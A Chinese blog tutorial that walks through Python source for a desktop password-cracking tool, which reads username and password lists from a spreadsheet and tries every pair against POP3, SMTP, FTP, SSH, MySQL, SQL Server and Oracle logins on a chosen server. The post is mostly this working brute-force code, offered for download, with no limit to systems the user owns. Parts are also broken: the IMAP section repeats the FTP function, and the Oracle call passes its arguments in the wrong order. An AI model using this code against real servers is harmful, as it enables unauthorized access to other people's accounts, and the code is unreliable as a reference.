太实用了!自己动手写软件——我们的密码PJ工具终于完成了
mhr18 2024-10-15 11:06 27 浏览 0 评论
之前我们完成了密码PJ工具的界面,今天我们来看看功能实现吧。
目录
- 编码
- 提交——功能实现
- 开始破解——功能实现
- 读取密码字典
- 选择协议并执行破解动作
- POP3协议的破解函数
- IMAP协议的破解函数
- SMTP协议的破解函数
- FTP协议的破解函数
- SSH协议的破解函数
- MySQL协议的破解函数
- SQL server协议的破解函数
- Oracle协议的破解函数
- 实现效果
- FTP协议
- Oracle协议
- 程序获取
编码
提交——功能实现
首先我们先完成“提交”功能的实现,“提交”按钮的作用是将用户填写的服务器地址、服务器端口和协议类型信息存储起来,用于后面的密码验证。所以我们先定义了一个字典(因为oracle的数据库连接必须要实例名,所以我们新增了一个db_name)。
1 dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}
获取服务器地址和端口我们定义了一个回调函数gettext,将两个Entry对象传递过来后,直接使用一个get命令就可以将Entry中的内容取出来,同时我们添加了对IP和端口的合法性校验。
1 def gettext(x,y):
2 """
3 获取输入框内容
4 :param x: 输入框对象——服务器IP
5 :param y: 输入框对象——服务器端口
6 :return:
7 """
8 server_ip = x.get()
9 server_port = y.get()
10 #判断输入的IP和端口是否合法
11 if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)):
12 tkinter.messagebox._show(title="IP输入不合法", message='请重新输入合法IP')
13 # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})#34;,server_port)):
14 elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)#34;,server_port)):
15 tkinter.messagebox._show(title="端口输入不合法", message='请重新输入合法端口')
16 else:
17 dic_list["server_port"] = server_port
18 dic_list["server_ip"] = server_ip
19 print(dic_list["server_ip"],dic_list["server_port"])
对于协议类型的读取,我们定义了一个回调函数get_select,同时我们对协议是否选择进行判断,若没有选择则提示重新选择协议。
1 def get_select(y,list_pro):
2 """
3 获取列表的选择
4 :param y:列表框对象
5 :param list_pro:列表
6 """
7 for i in range(0, len(list_pro)):
8 if y.selection_includes(i):
9 #补充dic_list字典中的协议字段内容
10 dic_list["pro"] = list_pro[i]
11 else:
12 pass
13 if dic_list["pro"]=="":
14 tkinter.messagebox._show(title="协议未选择", message='请重新破解协议')
15 elif dic_list["pro"]=='Oracle':
16 dic_list['db_name']=getInput("Oracle实例","请输入Oracle实例信息")
17 print(dic_list['db_name'])
同时我们添加了一个对oracle协议的判断,若选择oracle协议则需要弹出一个窗口填写数据库实例名称。我们新增了一个弹框输入的函数get_Input进行调用。
1 def getInput(title, message):
2 def return_callback(event):
3 print('quit...')
4 root.quit()
5 ?
6 def close_callback():
7 tkinter.messagebox.showinfo('message', 'no click...')
8 ?
9 root = tkinter.Tk(className=title)
10 root.wm_attributes('-topmost', 1)
11 screenwidth, screenheight = root.maxsize()
12 width = 300
13 height = 100
14 size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
15 root.geometry(size)
16 root.resizable(0, 0)
17 lable = tkinter.Label(root, height=2)
18 lable['text'] = message
19 lable.pack()
20 entry = tkinter.Entry(root)
21 entry.bind('<Return>', return_callback)
22 entry.pack()
23 entry.focus_set()
24 root.protocol("WM_DELETE_WINDOW", close_callback)
25 root.mainloop()
26 str = entry.get()
27 root.destroy()
28 return str
这样我们的“提交”按钮功能就全部完成了。接下来我们看看“开始破解”菜单按钮的功能。
开始破解——功能实现
我们定义了一个回调函数为mimapojie
- 首先会读取密码字典
- 然后是选择协议并执行破解动作
- 最后是展示破解结果
1 def mimapojie(server_ip,server_port,pro):
2 get_user_and_passwd('./test.xls', 0)
3 print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])
4 #展示破解结果
5 tkinter.messagebox._show(title='破解结果',message=dic_list['pro'],detail=print_list)
接下来我们依次看看这三个方面都是如何实现的。
读取密码字典
我们使用的是我们之前文章中使用的读取Excel表格的方式,我们直接将第一列的内容读取到user_list列表中,将第二列内容读取到password_list列表中。
1 def get_user_and_passwd(file_path, sheet_id):
2 """
3 获取密码库中的用户名密码
4 :param file_path: 密码库的路径及文件名
5 :param sheet_id: 密码库中的sheet id
6 """
7 read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id)
8 rows = read_excel.get_lines()
9 global user_list
10 global password_list
11 for i in range(0, rows):
12 if read_excel.get_value(i, 0):
13 user_list.append(read_excel.get_value(i, 0))
14 if read_excel.get_value(i, 1):
15 password_list.append(read_excel.get_value(i, 1))
选择协议并执行破解动作
我们定义了一个选择协议函数,根据获取到的选择协议字段执行不同的破解函数。
1 def choice_protocol(server_ip,server_port, pro,db_name):
2 """
3 选择需要破解的协议
4 :param server_ip:需要破解的服务器IP
5 :param server_port:需要破解的服务器端口
6 :param pro: 需要破解的协议
7 :param db_name: oracle数据库的实例名
8 """
9 if pro == "POP3":
10 attempt_pop(server_ip, server_port)
11 elif pro == "IMAP":
12 print('this is a test')
13 attempt_imap(server_ip, server_port)
14 elif pro == "SMTP":
15 attempt_smtp(server_ip, server_port)
16 elif pro == "FTP":
17 attempt_ftp(server_ip, server_port)
18 elif pro == "SSH":
19 attempt_ssh(server_ip, server_port)
20 elif pro == 'MySql':
21 attempt_mysql(server_ip, server_port)
22 elif pro == "SQL Server":
23 attempt_mssql(server_ip, server_port)
24 elif pro == "Oracle":
25 attempt_oracle(server_ip, server_port,db_name)
26 ?
27 return print_list
POP3协议的破解函数
1 def attempt_pop(server_ip, server_port):
2 """
3 破解POP3协议的用户名密码
4 :param server_ip: 破解的服务器IP
5 :param server_port: 破解的服务器端口
6 """
7 print("=======破解POP3协议========")
8 print_list.clear()
9 for i in range(0, len(user_list)):
10 for j in range(0, len(password_list)):
11 try:
12 pop3_server = poplib.POP3(host=server_ip,port=server_port)
13 pop3_server.user(user_list[i])
14 pop3_server.pass_(password_list[j])
15 #获取邮件列表,用于判断是否登录成功
16 pop3_server.list()
17 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
18 except:
19 pass
20 if not print_list:
21 print_list.append("密码破解失败")
IMAP协议的破解函数
1 def attempt_ftp(server_ip,port=21):
2 """
3 破解FTP协议的用户名密码
4 :param server_ip: 破解的服务器IP
5 :param port: 破解的服务器端口,默认为21
6 """
7 ftp = FTP()
8 ftp.connect(server_ip, port)
9 global print_list
10 print_list.clear()
11 for i in range(0, len(user_list)):
12 for j in range(0, len(password_list)):
13 try:
14 ftp.login(user_list[i], password_list[j])
15 ftp.quit()
16 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
17 except:
18 pass
19 if not print_list:
20 print_list.append("密码破解失败")
SMTP协议的破解函数
1 def attempt_smtp(mail_host, port=25):
2 """
3 破解SMTP协议的用户名密码
4 :param mail_host: 破解的服务器IP
5 :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
6 :param port: 破解服务器的端口,默认为25
7 """
8 print("=======破解SMTP协议========")
9 ?
10 global user_list
11 global password_list
12 print_list.clear()
13 for i in range(0, len(user_list)):
14 for j in range(0, len(password_list)):
15 try:
16 smtpObj = smtplib.SMTP(timeout=3)
17 smtpObj.set_debuglevel(0)
18 smtpObj.connect(mail_host, port) # 25 为 SMTP 端口号
19 smtpObj.login(user_list[i], password_list[j])
20 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
21 except Exception as e:
22 print(e)
23 pass
24 if not print_list:
25 print_list.append("密码破解失败")
FTP协议的破解函数
1 def attempt_ftp(server_ip,port=21):
2 """
3 破解FTP协议的用户名密码
4 :param server_ip: 破解的服务器IP
5 :param port: 破解的服务器端口,默认为21
6 """
7 ftp = FTP()
8 ftp.connect(server_ip, port)
9 global print_list
10 print_list.clear()
11 for i in range(0, len(user_list)):
12 for j in range(0, len(password_list)):
13 try:
14 ftp.login(user_list[i], password_list[j])
15 ftp.quit()
16 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
17 except:
18 pass
19 if not print_list:
20 print_list.append("密码破解失败")
SSH协议的破解函数
def attempt_ssh(server_ip, port=22):
"""
破解SSH协议的用户名密码
:param server_ip: 破解的服务器IP
:param port: 破解的服务器端口,默认为22
"""
print("=======破解SSH协议========")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j])
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
MySQL协议的破解函数
def attempt_mysql(server_ip, server_port=3306,db_name='mysql'):
"""
破解MySQL协议的用户名密码
:param server_ip: 破解的服务器IP
:param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
"""
print("=======破解MYSQL协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
# pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name)
db = pymysql.connect(server_ip, user_list[i], password_list[j])
db.close()
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
SQL server协议的破解函数
def attempt_mssql(server_ip, server_port):
"""
破解SQL server协议的用户名密码
:param server_ip: 破解的服务器IP
:param server_port: 破解的服务器端口
"""
print("=======破解SQL Server协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
db = pymssql.connect(server_ip,user_list[i],password_list[j])
db.close()
# print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
Oracle协议的破解函数
def attempt_oracle(server_ip,db_name, port=1521 ):
"""
破解Oracle协议的用户名密码
:param server_ip: 破解的服务器IP
:param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
:param port: 破解的服务器端口,默认为1521
"""
print("=======破解Oracle协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name)
# print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except Exception as e:
pass
if not print_list:
print_list.append("密码破解失败")
实现效果
这样我们的软件就实现了,我们看一下ftp协议和Oracle协议的破解效果吧。
FTP协议
页面填写
破解结果
Oracle协议
破解界面配置同ftp界面,点击“提交”后会弹出输入实例名的窗口,输入实例名并回车即可。
因为菜鸟小白没有搭建Oracle服务器所以破解失败的结果如下:
程序获取
老规矩,关注公众号“菜鸟小白的学习分享”。
- 回复“密码破解源码”即可获得源码下载链接
- 回复“密码破解可执行程序”即可获得工具软件
相关推荐
- 【预警通报】关于WebLogic存在远程代码执行高危漏洞的预警通报
-
近日,Oracle官方发布了2021年1月关键补丁更新公告CPU(CriticalPatchUpdate),共修复了包括CVE-2021-2109(WeblogicServer远程代码执行漏洞)...
- 医院信息系统突发应急演练记录(医院信息化应急演练)
-
信息系统突发事件应急预案演练记录演练内容信息系统突发事件应急预案演练参与人员信息科参与科室:全院各部门日期xxxx-xx-xx时间20:00至24:00地点信息科记录:xxx1、...
- 一文掌握怎么利用Shell+Python实现完美版的多数据源备份程序
-
简介:在当今数字化时代,无论是企业还是个人,数据的安全性和业务的连续性都是至关重要的。数据一旦丢失,可能会造成无法估量的损失。因此,如何有效地对分布在不同位置的数据进行备份,尤其是异地备份,成为了一个...
- docker搭建系统环境(docker搭建centos)
-
Docker安装(CentOS7)1.卸载旧版Docker#检查已安装版本yumlistinstalled|grepdocker#卸载旧版本yumremove-ydocker.x...
- 基础篇:数据库 SQL 入门教程(sql数据库入门书籍推荐)
-
SQL介绍什么是SQLSQL指结构化查询语言,是用于访问和处理数据库的标准的计算机语言。它使我们有能力访问数据库,可与多种数据库程序协同工作,如MSAccess、DB2、Informix、M...
- Java21杀手级新特性!3行代码性能翻倍
-
导语某券商系统用这招,交易延迟从12ms降到0.8ms!本文揭秘Oracle官方未公开的Record模式匹配+虚拟线程深度优化+向量API神操作,代码量直降70%!一、Record模式匹配(代码量↓8...
- 一文读懂JDK21的虚拟线程(java虚拟线程)
-
概述JDK21已于2023年9月19日发布,作为Oracle标准Java实现的一个LTS版本发布,发布了15想新特性,其中虚拟线程呼声较高。虚拟线程是JDK21中引入的一项重要特性,它是一种轻量级的...
- 效率!MacOS下超级好用的Linux虚拟工具:Lima
-
对于MacOS用户来说,搭建Linux虚拟环境一直是件让人头疼的事。无论是VirtualBox还是商业的VMware,都显得过于笨重且配置复杂。今天,我们要介绍一个轻巧方便的纯命令行Linux虚拟工具...
- 所谓SaaS(所谓三维目标一般都应包括)
-
2010年前后,一个科技媒体的主编写一些关于云计算的概念性问题,就可以作为头版头条了。那时候的云计算,更多的还停留在一些概念性的问题上。而基于云计算而生的SaaS更是“养在深闺人未识”,一度成为被IT...
- ORA-00600 「25027」 「x」报错(报错0xc0000001)
-
问题现象:在用到LOB大对象的业务中,进行数据的插入,失败了,在报警文件中报错:ORA-00600:内部错误代码,参数:[25027],[10],[0],[],[],[],[],[...
- 安卓7源码编译(安卓源码编译环境lunch失败,uname命令找不到)
-
前面已经下载好源码了,接下来是下载手机对应的二进制驱动执行编译源码命令下载厂商驱动https://developers.google.com/android/drivers?hl=zh-cn搜索NGI...
- 编译安卓源码(编译安卓源码 电脑配置)
-
前面已经下载好源码了,接下来是下载手机对应的二进制驱动执行编译源码命令下载厂商驱动https://developers.google.com/android/drivers?hl=zh-cn搜索NGI...
- 360 Vulcan Team首战告捷 以17.5万美金强势领跑2019“天府杯“
-
2019年11月16日,由360集团、百度、腾讯、阿里巴巴、清华大学与中科院等多家企业和研究机构在成都联合主办了2019“天府杯”国际网络安全大赛暨2019天府国际网络安全高峰论坛。而开幕当日最激荡人...
- Syslog 日志分析与异常检测技巧(syslog发送日志配置)
-
系统日志包含有助于分析网络设备整体运行状况的重要信息。然而,理解并从中提取有效数据往往颇具挑战。本文将详解从基础命令行工具到专业日志管理软件的全流程分析技巧,助你高效挖掘Syslog日志价值。Gr...
- 从Oracle演进看数据库技术的发展(从oracle演进看数据库技术的发展的过程)
-
数据库技术发展本质上是应用需求驱动与基础架构演进的双向奔赴,如何分析其技术发展的脉络和方向?考虑到oracle数据库仍然是这个领域的王者,以其为例,管中窥豹,对其从Oracle8i到23ai版本的核...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracle位图索引 (74)
- oracle基目录 (50)
- oracle批量插入数据 (65)
- oracle事务隔离级别 (53)
- oracle主从同步 (55)
- oracle 乐观锁 (51)
- redis 命令 (78)
- php redis (88)
- redis 存储 (66)
- redis 锁 (69)
- 启动 redis (66)
- redis 时间 (56)
- redis 删除 (67)
- redis内存 (57)
- redis并发 (52)
- redis 主从 (69)
- redis 订阅 (51)
- redis 登录 (54)
- redis 面试 (58)
- 阿里 redis (59)
- redis 搭建 (53)
- redis的缓存 (55)
- lua redis (58)
- redis 连接池 (61)
- redis 限流 (51)